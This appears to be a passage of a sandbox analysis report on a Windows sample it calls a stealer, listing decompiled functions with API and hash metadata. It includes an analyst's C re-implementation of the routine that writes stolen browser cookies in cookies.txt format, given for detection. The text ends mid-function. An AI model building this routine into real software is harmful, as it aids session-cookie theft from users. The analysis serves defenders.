                                                                                                                                                				_t107 =  *(_t97 + 0x40) & 0x00004000;
                                                                                                                                                				_t34 = _t99;
                                                                                                                                                				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
                                                                                                                                                					_push(L"FALSE");
                                                                                                                                                				} else {
                                                                                                                                                					_push(L"TRUE");
                                                                                                                                                				}
                                                                                                                                                				E004063DD(_t34, _t81, _t91, _t107);
                                                                                                                                                				E004063DD(_t99, _t81, _t91, _t107);
                                                                                                                                                				_t82 =  *((intOrPtr*)(_t97 + 0x14));
                                                                                                                                                				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
                                                                                                                                                				_t108 = _t39;
                                                                                                                                                				if(_t39 == 0) {
                                                                                                                                                					_t39 = 0x40f454;
                                                                                                                                                				}
                                                                                                                                                				E004063DD(_t99, _t82, _t91, _t108, _t39);
                                                                                                                                                				E004063DD(_t99, _t82, _t91, _t108, _t78);
                                                                                                                                                				_t109 =  *(_t97 + 0x40) & 0x00000001;
                                                                                                                                                				_t44 = L"TRUE";
                                                                                                                                                				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
                                                                                                                                                					_t44 = L"FALSE";
                                                                                                                                                				}
                                                                                                                                                				E004063DD(_t99, _t82, _t91, _t109, _t44);
                                                                                                                                                				E004063DD(_t99, _t82, _t91, _t109, _t78);
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosw");
                                                                                                                                                				_v88.wYear = 0x7b2;
                                                                                                                                                				_v88.wDay = 1;
                                                                                                                                                				_v88.wMonth = 1;
                                                                                                                                                				SystemTimeToFileTime( &_v88,  &_v96);
                                                                                                                                                				_t90 = _v96.dwLowDateTime;
                                                                                                                                                				asm("sbb ecx, edi");
                                                                                                                                                				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
                                                                                                                                                				_push(_t90);
                                                                                                                                                				_push(_t56);
                                                                                                                                                				_push(L"%I64d");
                                                                                                                                                				_push(0x1f);
                                                                                                                                                				_push( &_v88);
                                                                                                                                                				L0040DFD6();
                                                                                                                                                				_t96 = _v20;
                                                                                                                                                				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
                                                                                                                                                				_t80 = "\t";
                                                                                                                                                				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
                                                                                                                                                				_t85 =  *((intOrPtr*)(_t97 + 0x18));
                                                                                                                                                				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
                                                                                                                                                				_t110 = _t64;
                                                                                                                                                				if(_t64 == 0) {
                                                                                                                                                					_t64 = 0x40f454;
                                                                                                                                                				}
                                                                                                                                                				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
                                                                                                                                                				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
                                                                                                                                                				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
                                                                                                                                                				_t111 = _t70;
                                                                                                                                                				if(_t70 == 0) {
                                                                                                                                                					_t70 = 0x40f454;
                                                                                                                                                				}
                                                                                                                                                				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
                                                                                                                                                			}

Address gutter for the decompiled listing above (instruction addresses 0x0040228c through 0x00402433, one per source line).


                                                                                                                                                APIs
                                                                                                                                                • SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
                                                                                                                                                • __aulldiv.LIBCMT ref: 0040239D
                                                                                                                                                • _snwprintf.MSVCRT ref: 004023B0
                                                                                                                                                  • Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
                                                                                                                                                  • Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
                                                                                                                                                • String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
                                                                                                                                                • API String ID: 1007903050-2074899967
                                                                                                                                                • Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                • Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
                                                                                                                                                • Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
                                                                                                                                                • Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
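The function decompiled above (the one calling SystemTimeToFileTime at 0040236D) serialises one object into a tab-separated text record: an optional "." plus the string at +0x10, TRUE/FALSE for bit 0x4000 of the flags word at +0x40, the string at +0x14, TRUE/FALSE for bit 0x1, a 64-bit FILETIME at +0x30/+0x34 converted to Unix seconds (subtract the FILETIME of 1970-01-01, divide by 0x989680 = 10,000,000 with __aulldiv, print with "%I64d"), then the strings at +0x18 and +0x1c, terminated by "\r\n". That column order matches the Netscape cookies.txt layout (domain, include-subdomains, path, secure, expiry, name, value), which is consistent with the stealer verdict in the report. The following is an added example written for this page, not code from the sample or from the sandbox report: it re-implements the conversion and the record format so an analyst can recognise the output. The struct name, field names and the cookies.txt interpretation are assumptions drawn from the offsets and string constants in the listing; the listing substitutes a fixed string at 0x40f454 when its lookup returns 0, which this example presumes to be an empty string; and the sample performs no range check before the subtraction, whereas the guard below is an addition.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 100-ns FILETIME ticks between 1601-01-01 and 1970-01-01 UTC.
 * The sample derives this at run time by calling SystemTimeToFileTime on
 * a SYSTEMTIME of {wYear = 1970 (0x7b2), wMonth = 1, wDay = 1}. */
#define EPOCH_1970_FILETIME 116444736000000000ULL
#define TICKS_PER_SECOND    10000000ULL   /* 0x989680 in the listing */

/* Hypothetical record mirroring the offsets the decompiled function reads. */
typedef struct {
    const char *domain;     /* +0x10 */
    const char *path;       /* +0x14 */
    const char *name;       /* +0x18 */
    const char *value;      /* +0x1c */
    uint32_t    expires_lo; /* +0x30, FILETIME dwLowDateTime  */
    uint32_t    expires_hi; /* +0x34, FILETIME dwHighDateTime */
    uint32_t    flags;      /* +0x40, bits 0x4000 and 0x1 are tested */
} cookie_rec;

/* FILETIME (lo/hi DWORDs) to Unix seconds: subtract the 1970 epoch, then
 * unsigned-divide by 10,000,000, as the listing does via __aulldiv.
 * The sample has no guard; returning 0 for pre-1970 values is an addition. */
long long filetime_to_unix(uint32_t lo, uint32_t hi) {
    uint64_t ft = ((uint64_t)hi << 32) | lo;
    if (ft < EPOCH_1970_FILETIME)
        return 0;
    return (long long)((ft - EPOCH_1970_FILETIME) / TICKS_PER_SECOND);
}

static const char *or_empty(const char *s) { return s ? s : ""; }

/* Build the record exactly in the listing's order:
 * [.]domain \t TRUE|FALSE \t path \t TRUE|FALSE \t expiry \t name \t value \r\n
 * Returns the number of bytes written, or -1 if the buffer is too small. */
int format_cookie_line(const cookie_rec *c, char *out, size_t cap) {
    int dotted = (c->flags & 0x4000) != 0;   /* "." prefix and 2nd column */
    int secure = (c->flags & 0x1) != 0;      /* 4th column */
    int n = snprintf(out, cap, "%s%s\t%s\t%s\t%s\t%lld\t%s\t%s\r\n",
                     dotted ? "." : "", or_empty(c->domain),
                     dotted ? "TRUE" : "FALSE",
                     or_empty(c->path),
                     secure ? "TRUE" : "FALSE",
                     filetime_to_unix(c->expires_lo, c->expires_hi),
                     or_empty(c->name), or_empty(c->value));
    if (n < 0 || (size_t)n >= cap)
        return -1;
    return n;
}

/* Constructed sample input: expiry 2021-01-01T00:00:00Z as a FILETIME
 * (132539328000000000 ticks), flags with both tested bits set. */
const char *sample_cookie_line(void) {
    static char buf[256];
    const uint64_t ft = 132539328000000000ULL;
    cookie_rec c = { "example.test", "/", "sid", "abc",
                     (uint32_t)ft, (uint32_t)(ft >> 32), 0x4001 };
    if (format_cookie_line(&c, buf, sizeof buf) < 0)
        buf[0] = '\0';
    return buf;
}

int main(void) {
    fputs(sample_cookie_line(), stdout);
    return 0;
}
```

Hunting for the output in a sandbox's dropped files or network captures is simpler than matching the code: every line has exactly six tabs, the second and fourth columns are literally TRUE or FALSE, the fifth is a decimal Unix timestamp, and the line ends in CRLF rather than the bare LF a browser-exported cookies.txt would normally use.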

                                                                                                                                                C-Code - Quality: 48%
                                                                                                                                                			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
                                                                                                                                                				wchar_t* _v0;
                                                                                                                                                				int _v4;
                                                                                                                                                				int _t39;
                                                                                                                                                				wchar_t* _t49;
                                                                                                                                                				void* _t51;
                                                                                                                                                				int _t67;
                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                				signed int _t70;
                                                                                                                                                				signed int _t71;
                                                                                                                                                
                                                                                                                                                				_t59 = __ecx;
                                                                                                                                                				_t71 = _t70 & 0xfffffff8;
                                                                                                                                                				E0040E340(0x404c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize); // number of items in the menu being walked
				_a4 = _t39;
				_v4 = 0; // current item position
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a58, 0, 0x2000); // clear the item-text buffer
						_t71 = _t71 + 0xc;
						_a44 =  &_a56; // MENUITEMINFOW.dwTypeData -> text buffer
						_a8.cbSize = 0x30; // sizeof(MENUITEMINFOW) on 32-bit
						_a12 = 0x36; // fMask = MIIM_ID | MIIM_SUBMENU | MIIM_TYPE | MIIM_DATA
						_a48 = 0x1000; // cch: capacity of the text buffer
						_a56 = 0;
						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) { // fByPosition = TRUE
							goto L14;
						}
						if(_a56 == 0) { // item has no text: only descend into a submenu, if present
							L12:
							_t80 = _a28; // hSubMenu
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E0040699E(_t59, _t80); // recursive call for the submenu
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t67 = _a24; // wID
						_a8256 = 0;
						memset( &_a8258, 0, 0x2000); // second buffer receives the replacement text
						_t49 = wcschr( &_a56, 9); // locate '\t': accelerator text follows the tab
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x412c34 =  *0x412c34 + 1; // global counter
								_t68 =  *0x412c34; // 0x0
								_t67 = _t68 + 0x11558;
								__eflags = _t67;
							} else {
								_t67 = _v4 + 0x11171;
							}
						}
						_t51 = E00406D16(_t67,  &_a8256); // resolve text for this id into the second buffer; non-zero on success
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								wcscat( &_a8256, _v0); // keep the original accelerator text
								_pop(_t59);
							}
							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256); // 0x400 = MF_BYPOSITION
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
• Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
• Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
• Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
• Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E00402754(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8; // INITCOMMONCONTROLSEX.dwSize = sizeof(INITCOMMONCONTROLSEX)
				_v8 = 0xff; // INITCOMMONCONTROLSEX.dwICC = ICC_WIN95_CLASSES
				_t15 = 0; // result of InitCommonControlsEx
				_t20 = 0; // set once InitCommonControlsEx has been resolved and called
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17(); // comctl32 ordinal 17 (InitCommonControls): fallback with no return value
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30); // MB_ICONWARNING
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12); // InitCommonControlsEx(&icce)
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5; // export not found: use the ordinal-17 fallback
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                • Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
                                                                                                                                                • Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
                                                                                                                                                • Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                				struct HWND__* _v8;
                                                                                                                                                				struct HWND__* _v12;
                                                                                                                                                				struct tagRECT _v28;
                                                                                                                                                				struct tagRECT _v44;
                                                                                                                                                				int _t50;
                                                                                                                                                				long _t61;
                                                                                                                                                				struct HDC__* _t63;
                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                				struct HWND__* _t71;
                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                				void* _t73;
                                                                                                                                                				int _t74;
                                                                                                                                                				int _t80;
                                                                                                                                                				int _t83;
                                                                                                                                                
                                                                                                                                                				_t73 = __edx;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				_t74 = GetSystemMetrics(0x11);
                                                                                                                                                				_t80 = GetSystemMetrics(0x10);
                                                                                                                                                				if(_t74 == 0 || _t80 == 0) {
                                                                                                                                                					_t63 = GetDC(0);
                                                                                                                                                					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                                                					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                                                					ReleaseDC(0, _t63);
                                                                                                                                                				}
                                                                                                                                                				GetWindowRect(_a4,  &_v44);
                                                                                                                                                				if((_a8 & 0x00000004) != 0) {
                                                                                                                                                					_t71 = GetParent(_a4);
                                                                                                                                                					if(_t71 != 0) {
                                                                                                                                                						_v28.left = _v28.left & 0x00000000;
                                                                                                                                                						asm("stosd");
                                                                                                                                                						asm("stosd");
                                                                                                                                                						asm("stosd");
                                                                                                                                                						GetWindowRect(_t71,  &_v28);
                                                                                                                                                						_t61 = _v28.left;
                                                                                                                                                						_t72 = _v28.top;
                                                                                                                                                						_t80 = _v28.right - _t61 + 1;
                                                                                                                                                						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                                                						_v8 = _t61;
                                                                                                                                                						_v12 = _t72;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t65 = _v44.right;
                                                                                                                                                				if((_a8 & 0x00000001) == 0) {
                                                                                                                                                					asm("cdq");
                                                                                                                                                					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                                                				} else {
                                                                                                                                                					_t83 = 0;
                                                                                                                                                				}
                                                                                                                                                				_t68 = _v44.bottom;
                                                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                					L11:
                                                                                                                                                					_t50 = 0;
                                                                                                                                                					goto L12;
                                                                                                                                                				} else {
                                                                                                                                                					asm("cdq");
                                                                                                                                                					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                                                					if(_t50 >= 0) {
                                                                                                                                                						L12:
                                                                                                                                                						if(_t83 < 0) {
                                                                                                                                                							_t83 = 0;
                                                                                                                                                						}
                                                                                                                                                						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                                                					}
                                                                                                                                                					goto L11;
                                                                                                                                                				}
                                                                                                                                                			}
                                                                                                                                                0x00405b17
                                                                                                                                                0x00405b2a
                                                                                                                                                0x00405b2d
                                                                                                                                                0x00405b34
                                                                                                                                                0x00405b3a
                                                                                                                                                0x00405b3c
                                                                                                                                                0x00405b4f
                                                                                                                                                0x00405b59
                                                                                                                                                0x00405b60
                                                                                                                                                0x00405b62
                                                                                                                                                0x00405b62
                                                                                                                                                0x00405b75
                                                                                                                                                0x00405b7b
                                                                                                                                                0x00405b86
                                                                                                                                                0x00405b8a
                                                                                                                                                0x00405b8c
                                                                                                                                                0x00405b95
                                                                                                                                                0x00405b96
                                                                                                                                                0x00405b97
                                                                                                                                                0x00405b9d
                                                                                                                                                0x00405b9f
                                                                                                                                                0x00405ba5
                                                                                                                                                0x00405baf
                                                                                                                                                0x00405bb0
                                                                                                                                                0x00405bb1
                                                                                                                                                0x00405bb4
                                                                                                                                                0x00405bb4
                                                                                                                                                0x00405b8a
                                                                                                                                                0x00405bbb
                                                                                                                                                0x00405bbe
                                                                                                                                                0x00405bcd
                                                                                                                                                0x00405bd4
                                                                                                                                                0x00405bc0
                                                                                                                                                0x00405bc0
                                                                                                                                                0x00405bc0
                                                                                                                                                0x00405bdb
                                                                                                                                                0x00405bde
                                                                                                                                                0x00405bf3
                                                                                                                                                0x00405bf3
                                                                                                                                                0x00000000
                                                                                                                                                0x00405be0
                                                                                                                                                0x00405be9
                                                                                                                                                0x00405bee
                                                                                                                                                0x00405bf1
                                                                                                                                                0x00405bf5
                                                                                                                                                0x00405bf7
                                                                                                                                                0x00405bf9
                                                                                                                                                0x00405bf9
                                                                                                                                                0x00405c16
                                                                                                                                                0x00405c16
                                                                                                                                                0x00000000
                                                                                                                                                0x00405bf1

                                                                                                                                                APIs
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00405B30
                                                                                                                                                • GetSystemMetrics.USER32 ref: 00405B36
                                                                                                                                                • GetDC.USER32(00000000), ref: 00405B43
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
                                                                                                                                                • ReleaseDC.USER32 ref: 00405B62
                                                                                                                                                • GetWindowRect.USER32 ref: 00405B75
                                                                                                                                                • GetParent.USER32(?), ref: 00405B80
                                                                                                                                                • GetWindowRect.USER32 ref: 00405B9D
                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2163313125-0
                                                                                                                                                • Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                • Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
                                                                                                                                                • Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
                                                                                                                                                • Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 16%
                                                                                                                                                			E0040DBDA(signed short* __eax, void* __ecx) {
                                                                                                                                                				void* _t2;
                                                                                                                                                				signed short* _t3;
                                                                                                                                                				void* _t7;
                                                                                                                                                				void* _t8;
                                                                                                                                                				void* _t10;
                                                                                                                                                
                                                                                                                                                 				// Walks the NUL-terminated wide string in __eax and writes an HTML-escaped copy to __ecx:
                                                                                                                                                 				// _t3 is the read cursor, _t8 the write cursor, _t7 (8 bytes) the size of the four-wchar entities.
                                                                                                                                                 				_t3 = __eax;
                                                                                                                                                 				_t8 = __ecx;
                                                                                                                                                 				_t7 = 8;
                                                                                                                                                				while(1) {
                                                                                                                                                 					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                                                 					if(_t2 != 0x3c) { // 0x3c is '<' -> "&lt;"
                                                                                                                                                						goto L3;
                                                                                                                                                					}
                                                                                                                                                					_push(_t7);
                                                                                                                                                					_push(L"&lt;");
                                                                                                                                                					L14:
                                                                                                                                                					_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                					_t10 = _t10 + 0xc;
                                                                                                                                                					_t8 = _t8 + _t7;
                                                                                                                                                					L16:
                                                                                                                                                					if( *_t3 != 0) {
                                                                                                                                                						_t3 =  &(_t3[1]);
                                                                                                                                                						continue;
                                                                                                                                                					}
                                                                                                                                                					return _t2;
                                                                                                                                                					L3:
                                                                                                                                                 					if(_t2 != 0x3e) { // '>' -> "&gt;"
                                                                                                                                                 						if(_t2 != 0x22) { // '"' -> "&quot;"
                                                                                                                                                 							// Decompiler rendering of a comparison with 0xb0 (sign-extended), i.e. '°' -> "&deg;"
                                                                                                                                                 							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                                                 								if(_t2 != 0x26) { // '&' -> "&amp;"
                                                                                                                                                 									if(_t2 != 0xa) { // '\n' -> "<br>"; any other character is copied through unchanged
                                                                                                                                                 										 *_t8 = _t2;
                                                                                                                                                										_t8 = _t8 + 2;
                                                                                                                                                									} else {
                                                                                                                                                										_push(_t7);
                                                                                                                                                										_push(L"<br>");
                                                                                                                                                										goto L14;
                                                                                                                                                									}
                                                                                                                                                								} else {
                                                                                                                                                									_push(0xa);
                                                                                                                                                									_push(L"&amp;");
                                                                                                                                                									goto L11;
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								_push(0xa);
                                                                                                                                                								_push(L"&deg;");
                                                                                                                                                								L11:
                                                                                                                                                								_t2 = memcpy(_t8, ??, ??);
                                                                                                                                                								_t10 = _t10 + 0xc;
                                                                                                                                                								_t8 = _t8 + 0xa;
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                                                							_t10 = _t10 + 0xc;
                                                                                                                                                							_t8 = _t8 + 0xc;
                                                                                                                                                						}
                                                                                                                                                					} else {
                                                                                                                                                						_push(_t7);
                                                                                                                                                						_push(L"&gt;");
                                                                                                                                                						goto L14;
                                                                                                                                                					}
                                                                                                                                                					goto L16;
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                 • Instruction addresses: 0x0040dbdf, 0x0040dbe1, 0x0040dbe3, 0x0040dbe4, 0x0040dbe4, 0x0040dbeb, 0x00000000, 0x00000000, 0x0040dbed, 0x0040dbee, 0x0040dc56, 0x0040dc57, 0x0040dc5c, 0x0040dc5f, 0x0040dc68, 0x0040dc6c, 0x0040dc6f, 0x00000000, 0x0040dc6f, 0x0040dc78, 0x0040dbf5, 0x0040dbf9, 0x0040dc07, 0x0040dc24, 0x0040dc33, 0x0040dc4e, 0x0040dc63, 0x0040dc67, 0x0040dc50, 0x0040dc50, 0x0040dc51, 0x00000000, 0x0040dc51, 0x0040dc35, 0x0040dc35, 0x0040dc37, 0x00000000, 0x0040dc37, 0x0040dc26, 0x0040dc26, 0x0040dc28, 0x0040dc3c, 0x0040dc3d, 0x0040dc42, 0x0040dc45, 0x0040dc45, 0x0040dc09, 0x0040dc11, 0x0040dc16, 0x0040dc19, 0x0040dc19, 0x0040dbfb, 0x0040dbfb, 0x0040dbfc, 0x00000000, 0x0040dbfc, 0x00000000, 0x0040dbf9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                • Instruction ID: 0c92722b5564fee70601bedc3038ef5bb71485c7004a8157c6d80a0c5a0d985f
                                                                                                                                                • Opcode Fuzzy Hash: e515d9530c1f27c32394133f4687b1e06294851c867495ee72b8dfb23976abf6
                                                                                                                                                • Instruction Fuzzy Hash: E001C0A2E6826061FA3021968C86FBA15549BA2B10FA0013BB986352C6D1FD09CFC15F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                			E00406827(signed short __ebx) {
                                                                                                                                                				signed int _t21;
                                                                                                                                                				void* _t22;
                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                				struct HINSTANCE__* _t25;
                                                                                                                                                				signed int _t27;
                                                                                                                                                				signed int _t30;
                                                                                                                                                				signed int _t31;
                                                                                                                                                				signed int _t32;
                                                                                                                                                				void* _t35;
                                                                                                                                                				signed short _t39;
                                                                                                                                                				signed int _t40;
                                                                                                                                                				signed int _t42;
                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                				signed int _t44;
                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                				intOrPtr _t49;
